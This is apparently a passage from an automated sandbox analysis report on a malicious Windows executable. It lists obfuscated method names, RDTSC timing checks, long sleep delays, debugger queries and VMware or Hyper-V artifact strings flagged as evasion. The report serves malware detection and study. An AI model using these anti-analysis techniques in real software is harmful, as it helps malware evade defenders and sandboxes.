              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, ARLosMUu9ux5s4xeIQ.cs High entropy of concatenated method names: 'Dr8y0bg4Hl', 'WXKyxwavvr', 'pIUoip4Wo3', 'PFQoRf85If', 'nVto47Tmty', 'ISooWqFtuC', 'wJRo7Ydcsq', 'msGorbEwew', 'IWooGJkW7V', 'p1hoq830g3'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, G8Ku1BusrwriixUXvf.cs High entropy of concatenated method names: 'Dispose', 'TvrHaJCQ1p', 'hEcUfxi1e2', 'bo9nnr8ccn', 'yivH8a6WcD', 'qTJHzNAtOH', 'ProcessDialogKey', 'bFMUAv62VB', 'KSPUHS0cUD', 'xRsUUTgL5X'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, XZbuRmxnN4Wcbhfseq.cs High entropy of concatenated method names: 'p3AobOLVmp', 'RJookTZ4DL', 'epsomG7uiO', 'fPOoMRkb32', 'keVosOXdGP', 'RUToFSapRT', 'tbSoY0UU0b', 'wgAocmN773', 'yuaotoAwpp', 'yafoPohyx1'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, loA94X8dLam0BqsKKi.cs High entropy of concatenated method names: 'p3otHQ0nPa', 'iWatld1nL8', 'QdZt5Muccx', 'mSQtD9kPMN', 'IBUtClP6bA', 'TRbtyZp79I', 'wkAtII4tQf', 'bcec3uH7gj', 'MOJc2IZ33N', 'yOQcakq7Ky'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, j6fOLPhmGRO9utyHLj.cs High entropy of concatenated method names: 'mPUgYaX1E', 'm5Db8RTXj', 'xepkaNjoB', 'KjhxDue0F', 'wYSMTm35W', 'HR0JHBagp', 'UP7A1n27KtoA8nlv3E', 'BVJdrnu5MoCBUv79dI', 'fXvcC1uce', 'mFMPlcOp6'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, sCfYWWat39XY9HRk8e.cs High entropy of concatenated method names: 'JsJ9mBHmrh', 'eEj9MPk3Lr', 'auU9KBAPm5', 'MA89fDSb3E', 'kVt9R3VjKZ', 'rFA94NkOYh', 'gEu97BwJJ2', 'yKl9r2LDAS', 'siL9qouSRo', 'GwC9h036K9'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, nwSOv7QdTPQVDnqvB5.cs High entropy of concatenated method names: 'YFIIODs1Qq', 'eMrIjPR59C', 'CWUIXJJclv', 'ToString', 'b1EILg492q', 'dhHI3YO57p', 'fPURABtZkDkJGDkukuF', 'VNT54Ht2aG4SYgCikQ0'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, AC6LD60IT9CHcXjx6o.cs High entropy of concatenated method names: 'UBkHww0qQk', 'YHJHZlGipT', 'wqbHByvlAW', 'YyTHuP0E02', 'lMBHsTxD5S', 'rrFHFIeKN0', 'KfssLM3mfNp9xYmpi7', 'YkOdMoqbDQdll6TluN', 'kBfHBDxHoLg4aO1GCk', 'hiaHHpuPGZ'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, L2MZqe5X1hqSn78nu9.cs High entropy of concatenated method names: 'BXNlelgRv2', 'e5KlDvYpS9', 'MTplCZsji2', 'hH9loHR14V', 'mMulyl8D83', 'xF9lIapcck', 'heslwdS87o', 'U7vlZGteKq', 'zIUlVIXyTG', 'vXqlBfkOaL'
              Source: 0.2.AB2hQJZ77ipdWem.exe.7850000.9.raw.unpack, sWtfTvoZJQoijAEbp3.cs High entropy of concatenated method names: 'nJIcKGaJOo', 'gD8cfRUFa6', 'YwociolUoZ', 'ANPcRphJsk', 'YhXcpT12bp', 'VsUc4cQLKq', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, A84fLPSIsCr4pNr2e1.cs High entropy of concatenated method names: 'CqZw6peOhm', 'h1NwdADq3d', 'kWdwgNtrr6', 'tKZwb49V96', 'TDGw0B3Qdo', 'LOewkZkmgP', 'ra4wxwQchy', 'SLewmQL4wR', 'b5KwMJXskU', 'ocHwJY6SVD'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, HxZ91e2qtRrpVHMmHE.cs High entropy of concatenated method names: 'JvnY22v44Q', 'TfyY8GdUjx', 'cipcAcUgVM', 'bJMcHogVH2', 'WyLYh4DXo0', 'ArEY1Lxfc2', 'rVNYQyA8Yf', 'LJLYphIsE6', 'iReYS5y7WR', 'wcgYOOMoiI'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, NByB4dfTi3kR926o21.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LORUajo9pN', 'nrJU8V4K0Q', 'xAMUzO6UGU', 'ieDlApofjr', 'YhylHKFY4A', 'kUYlU7dwQK', 'S33llmTWk8', 'LWWWSfiQgQOmjK7YI4v'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, yFkgMbnRXbdivPfDnN.cs High entropy of concatenated method names: 'fXwcDiSmwy', 'RoocCmVKfm', 'dEhcobuAXj', 'giscy5PCA6', 'gD1cIoMu18', 'moncw3GYoS', 'MWrcZIjBpA', 'k79cVKkSEp', 'F7pcBw8mfL', 'RdMcuUBj5d'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, xxcXVGtMuD6epI0GiVX.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D3rPp7pLnQ', 'CXRPS8MRun', 'L4dPOWF8fF', 'QVDPjSYdFU', 'ocXPX09tlX', 'Y3RPLU0xqI', 'e3dP38nnfU'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, lD2VpmLwy74UUFOu8Q.cs High entropy of concatenated method names: 'zBlIex2kgA', 'TTkICLn9DY', 'd5lIyBkFPG', 'nT5IwTxQZD', 'fHtIZx4k1j', 'l7qyXvwF1t', 'PGUyLqH89g', 'QLuy38NPXM', 'HMuy2VcCdq', 'BI5yaHP11i'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, LbokTxtwlaCQP5t1Y5j.cs High entropy of concatenated method names: 'S3it6vBg5B', 'tJctdRrX3S', 'QW0tgc8Inr', 'URQtbg3XE7', 'enlt01JULC', 'UT7tkkyNuM', 'zawtxrUOQ0', 'Jottmcx0vk', 'tJqtM4nx1u', 'OjFtJKELUR'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, oDbClXHY0rOWGmbvPY.cs High entropy of concatenated method names: 'HPWwDrRFWb', 'iFawoXTHEO', 'zdewIAQtPG', 'MeQI8e8rFH', 'BmKIzethpY', 'LWJwATbDpJ', 'gD3wHMVGsI', 'hwTwUqKga7', 'dGJwl0gbRu', 'gJGw5AVq9s'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, fQsIIlXm3Yrb2eUDWF.cs High entropy of concatenated method names: 'zlNCpIs07c', 'Ex0CSYgWDB', 'eCHCOlupMr', 'FcYCj8nsVG', 'cu0CXYg4jb', 'zX6CL2R0pq', 'e0mC3dNydv', 'R1bC2umg2C', 'jiCCa0HSsm', 'mn8C8moeUO'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, GEAuDLzPxjeVJtEtEV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oVrt9BkpYt', 'GgrtseS0Z4', 'Ae9tFE8YS0', 'PbTtYjNOlk', 'B4GtciECjo', 'qCltt0d9Hi', 'O6RtPOoLKp'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, ARLosMUu9ux5s4xeIQ.cs High entropy of concatenated method names: 'Dr8y0bg4Hl', 'WXKyxwavvr', 'pIUoip4Wo3', 'PFQoRf85If', 'nVto47Tmty', 'ISooWqFtuC', 'wJRo7Ydcsq', 'msGorbEwew', 'IWooGJkW7V', 'p1hoq830g3'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, G8Ku1BusrwriixUXvf.cs High entropy of concatenated method names: 'Dispose', 'TvrHaJCQ1p', 'hEcUfxi1e2', 'bo9nnr8ccn', 'yivH8a6WcD', 'qTJHzNAtOH', 'ProcessDialogKey', 'bFMUAv62VB', 'KSPUHS0cUD', 'xRsUUTgL5X'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, XZbuRmxnN4Wcbhfseq.cs High entropy of concatenated method names: 'p3AobOLVmp', 'RJookTZ4DL', 'epsomG7uiO', 'fPOoMRkb32', 'keVosOXdGP', 'RUToFSapRT', 'tbSoY0UU0b', 'wgAocmN773', 'yuaotoAwpp', 'yafoPohyx1'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, loA94X8dLam0BqsKKi.cs High entropy of concatenated method names: 'p3otHQ0nPa', 'iWatld1nL8', 'QdZt5Muccx', 'mSQtD9kPMN', 'IBUtClP6bA', 'TRbtyZp79I', 'wkAtII4tQf', 'bcec3uH7gj', 'MOJc2IZ33N', 'yOQcakq7Ky'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, j6fOLPhmGRO9utyHLj.cs High entropy of concatenated method names: 'mPUgYaX1E', 'm5Db8RTXj', 'xepkaNjoB', 'KjhxDue0F', 'wYSMTm35W', 'HR0JHBagp', 'UP7A1n27KtoA8nlv3E', 'BVJdrnu5MoCBUv79dI', 'fXvcC1uce', 'mFMPlcOp6'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, sCfYWWat39XY9HRk8e.cs High entropy of concatenated method names: 'JsJ9mBHmrh', 'eEj9MPk3Lr', 'auU9KBAPm5', 'MA89fDSb3E', 'kVt9R3VjKZ', 'rFA94NkOYh', 'gEu97BwJJ2', 'yKl9r2LDAS', 'siL9qouSRo', 'GwC9h036K9'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, nwSOv7QdTPQVDnqvB5.cs High entropy of concatenated method names: 'YFIIODs1Qq', 'eMrIjPR59C', 'CWUIXJJclv', 'ToString', 'b1EILg492q', 'dhHI3YO57p', 'fPURABtZkDkJGDkukuF', 'VNT54Ht2aG4SYgCikQ0'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, AC6LD60IT9CHcXjx6o.cs High entropy of concatenated method names: 'UBkHww0qQk', 'YHJHZlGipT', 'wqbHByvlAW', 'YyTHuP0E02', 'lMBHsTxD5S', 'rrFHFIeKN0', 'KfssLM3mfNp9xYmpi7', 'YkOdMoqbDQdll6TluN', 'kBfHBDxHoLg4aO1GCk', 'hiaHHpuPGZ'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, L2MZqe5X1hqSn78nu9.cs High entropy of concatenated method names: 'BXNlelgRv2', 'e5KlDvYpS9', 'MTplCZsji2', 'hH9loHR14V', 'mMulyl8D83', 'xF9lIapcck', 'heslwdS87o', 'U7vlZGteKq', 'zIUlVIXyTG', 'vXqlBfkOaL'
              Source: 0.2.AB2hQJZ77ipdWem.exe.44c2dc0.6.raw.unpack, sWtfTvoZJQoijAEbp3.cs High entropy of concatenated method names: 'nJIcKGaJOo', 'gD8cfRUFa6', 'YwociolUoZ', 'ANPcRphJsk', 'YhXcpT12bp', 'VsUc4cQLKq', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, A84fLPSIsCr4pNr2e1.cs High entropy of concatenated method names: 'CqZw6peOhm', 'h1NwdADq3d', 'kWdwgNtrr6', 'tKZwb49V96', 'TDGw0B3Qdo', 'LOewkZkmgP', 'ra4wxwQchy', 'SLewmQL4wR', 'b5KwMJXskU', 'ocHwJY6SVD'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, HxZ91e2qtRrpVHMmHE.cs High entropy of concatenated method names: 'JvnY22v44Q', 'TfyY8GdUjx', 'cipcAcUgVM', 'bJMcHogVH2', 'WyLYh4DXo0', 'ArEY1Lxfc2', 'rVNYQyA8Yf', 'LJLYphIsE6', 'iReYS5y7WR', 'wcgYOOMoiI'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, NByB4dfTi3kR926o21.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'LORUajo9pN', 'nrJU8V4K0Q', 'xAMUzO6UGU', 'ieDlApofjr', 'YhylHKFY4A', 'kUYlU7dwQK', 'S33llmTWk8', 'LWWWSfiQgQOmjK7YI4v'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, yFkgMbnRXbdivPfDnN.cs High entropy of concatenated method names: 'fXwcDiSmwy', 'RoocCmVKfm', 'dEhcobuAXj', 'giscy5PCA6', 'gD1cIoMu18', 'moncw3GYoS', 'MWrcZIjBpA', 'k79cVKkSEp', 'F7pcBw8mfL', 'RdMcuUBj5d'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, xxcXVGtMuD6epI0GiVX.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'D3rPp7pLnQ', 'CXRPS8MRun', 'L4dPOWF8fF', 'QVDPjSYdFU', 'ocXPX09tlX', 'Y3RPLU0xqI', 'e3dP38nnfU'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, lD2VpmLwy74UUFOu8Q.cs High entropy of concatenated method names: 'zBlIex2kgA', 'TTkICLn9DY', 'd5lIyBkFPG', 'nT5IwTxQZD', 'fHtIZx4k1j', 'l7qyXvwF1t', 'PGUyLqH89g', 'QLuy38NPXM', 'HMuy2VcCdq', 'BI5yaHP11i'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, LbokTxtwlaCQP5t1Y5j.cs High entropy of concatenated method names: 'S3it6vBg5B', 'tJctdRrX3S', 'QW0tgc8Inr', 'URQtbg3XE7', 'enlt01JULC', 'UT7tkkyNuM', 'zawtxrUOQ0', 'Jottmcx0vk', 'tJqtM4nx1u', 'OjFtJKELUR'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, oDbClXHY0rOWGmbvPY.cs High entropy of concatenated method names: 'HPWwDrRFWb', 'iFawoXTHEO', 'zdewIAQtPG', 'MeQI8e8rFH', 'BmKIzethpY', 'LWJwATbDpJ', 'gD3wHMVGsI', 'hwTwUqKga7', 'dGJwl0gbRu', 'gJGw5AVq9s'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, fQsIIlXm3Yrb2eUDWF.cs High entropy of concatenated method names: 'zlNCpIs07c', 'Ex0CSYgWDB', 'eCHCOlupMr', 'FcYCj8nsVG', 'cu0CXYg4jb', 'zX6CL2R0pq', 'e0mC3dNydv', 'R1bC2umg2C', 'jiCCa0HSsm', 'mn8C8moeUO'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, GEAuDLzPxjeVJtEtEV.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oVrt9BkpYt', 'GgrtseS0Z4', 'Ae9tFE8YS0', 'PbTtYjNOlk', 'B4GtciECjo', 'qCltt0d9Hi', 'O6RtPOoLKp'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, ARLosMUu9ux5s4xeIQ.cs High entropy of concatenated method names: 'Dr8y0bg4Hl', 'WXKyxwavvr', 'pIUoip4Wo3', 'PFQoRf85If', 'nVto47Tmty', 'ISooWqFtuC', 'wJRo7Ydcsq', 'msGorbEwew', 'IWooGJkW7V', 'p1hoq830g3'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, G8Ku1BusrwriixUXvf.cs High entropy of concatenated method names: 'Dispose', 'TvrHaJCQ1p', 'hEcUfxi1e2', 'bo9nnr8ccn', 'yivH8a6WcD', 'qTJHzNAtOH', 'ProcessDialogKey', 'bFMUAv62VB', 'KSPUHS0cUD', 'xRsUUTgL5X'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, XZbuRmxnN4Wcbhfseq.cs High entropy of concatenated method names: 'p3AobOLVmp', 'RJookTZ4DL', 'epsomG7uiO', 'fPOoMRkb32', 'keVosOXdGP', 'RUToFSapRT', 'tbSoY0UU0b', 'wgAocmN773', 'yuaotoAwpp', 'yafoPohyx1'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, loA94X8dLam0BqsKKi.cs High entropy of concatenated method names: 'p3otHQ0nPa', 'iWatld1nL8', 'QdZt5Muccx', 'mSQtD9kPMN', 'IBUtClP6bA', 'TRbtyZp79I', 'wkAtII4tQf', 'bcec3uH7gj', 'MOJc2IZ33N', 'yOQcakq7Ky'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, j6fOLPhmGRO9utyHLj.cs High entropy of concatenated method names: 'mPUgYaX1E', 'm5Db8RTXj', 'xepkaNjoB', 'KjhxDue0F', 'wYSMTm35W', 'HR0JHBagp', 'UP7A1n27KtoA8nlv3E', 'BVJdrnu5MoCBUv79dI', 'fXvcC1uce', 'mFMPlcOp6'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, sCfYWWat39XY9HRk8e.cs High entropy of concatenated method names: 'JsJ9mBHmrh', 'eEj9MPk3Lr', 'auU9KBAPm5', 'MA89fDSb3E', 'kVt9R3VjKZ', 'rFA94NkOYh', 'gEu97BwJJ2', 'yKl9r2LDAS', 'siL9qouSRo', 'GwC9h036K9'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, nwSOv7QdTPQVDnqvB5.cs High entropy of concatenated method names: 'YFIIODs1Qq', 'eMrIjPR59C', 'CWUIXJJclv', 'ToString', 'b1EILg492q', 'dhHI3YO57p', 'fPURABtZkDkJGDkukuF', 'VNT54Ht2aG4SYgCikQ0'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, AC6LD60IT9CHcXjx6o.cs High entropy of concatenated method names: 'UBkHww0qQk', 'YHJHZlGipT', 'wqbHByvlAW', 'YyTHuP0E02', 'lMBHsTxD5S', 'rrFHFIeKN0', 'KfssLM3mfNp9xYmpi7', 'YkOdMoqbDQdll6TluN', 'kBfHBDxHoLg4aO1GCk', 'hiaHHpuPGZ'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, L2MZqe5X1hqSn78nu9.cs High entropy of concatenated method names: 'BXNlelgRv2', 'e5KlDvYpS9', 'MTplCZsji2', 'hH9loHR14V', 'mMulyl8D83', 'xF9lIapcck', 'heslwdS87o', 'U7vlZGteKq', 'zIUlVIXyTG', 'vXqlBfkOaL'
              Source: 0.2.AB2hQJZ77ipdWem.exe.4452da0.5.raw.unpack, sWtfTvoZJQoijAEbp3.cs High entropy of concatenated method names: 'nJIcKGaJOo', 'gD8cfRUFa6', 'YwociolUoZ', 'ANPcRphJsk', 'YhXcpT12bp', 'VsUc4cQLKq', 'Next', 'Next', 'Next', 'NextBytes'
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara matchFile source: Process Memory Space: AB2hQJZ77ipdWem.exe PID: 7408, type: MEMORYSTR
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0774
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD8A4
              Source: C:\Windows\SysWOW64\cscript.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 27B9904 second address: 27B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
              Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 27B9B6E second address: 27B9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Memory allocated: 1660000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Memory allocated: 3110000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Memory allocated: 5110000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Memory allocated: 7E50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Memory allocated: 7A70000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Memory allocated: 8E50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Memory allocated: 9E50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_00409AA0 rdtsc 3_2_00409AA0
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5165
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4771
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 880
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 869
Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 6086
Source: C:\Windows\SysWOW64\cscript.exe Window / User API: threadDelayed 3409
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_4-13946
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe API coverage: 1.6 %
Source: C:\Windows\SysWOW64\cscript.exe API coverage: 1.6 %
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 7936 Thread sleep count: 5165 > 30
Source: C:\Windows\explorer.exe TID: 7936 Thread sleep time: -10330000s >= -30000s
Source: C:\Windows\explorer.exe TID: 7936 Thread sleep count: 4771 > 30
Source: C:\Windows\explorer.exe TID: 7936 Thread sleep time: -9542000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 7836 Thread sleep count: 6086 > 30
Source: C:\Windows\SysWOW64\cscript.exe TID: 7836 Thread sleep time: -12172000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 7836 Thread sleep count: 3409 > 30
Source: C:\Windows\SysWOW64\cscript.exe TID: 7836 Thread sleep time: -6818000s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_00632674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,5_2_00632674
Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000004.00000003.2287668154.0000000009330000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00=
Source: explorer.exe, 00000004.00000003.3076522967.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3827556743.0000000009255000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000002.3826801349.00000000091FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000004.00000002.3826801349.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1397007516.00000000090DA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000004.00000003.2287668154.0000000009330000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.1389830128.0000000000A20000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.3076522967.000000000927B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe Code function: 3_2_0040ACE0 LdrLoadDll,3_2_0040ACE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 5_2_0062AA82 LoadLibraryW,GetProcAddress,FreeLibrary,5_2_0062AA82
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
              Source: C:\Users\user\Desktop\AB2hQJZ77ipdWem.exeCode function: 3_2_01194500 mov eax, dword ptr fs:[00000030h]3_2_01194500
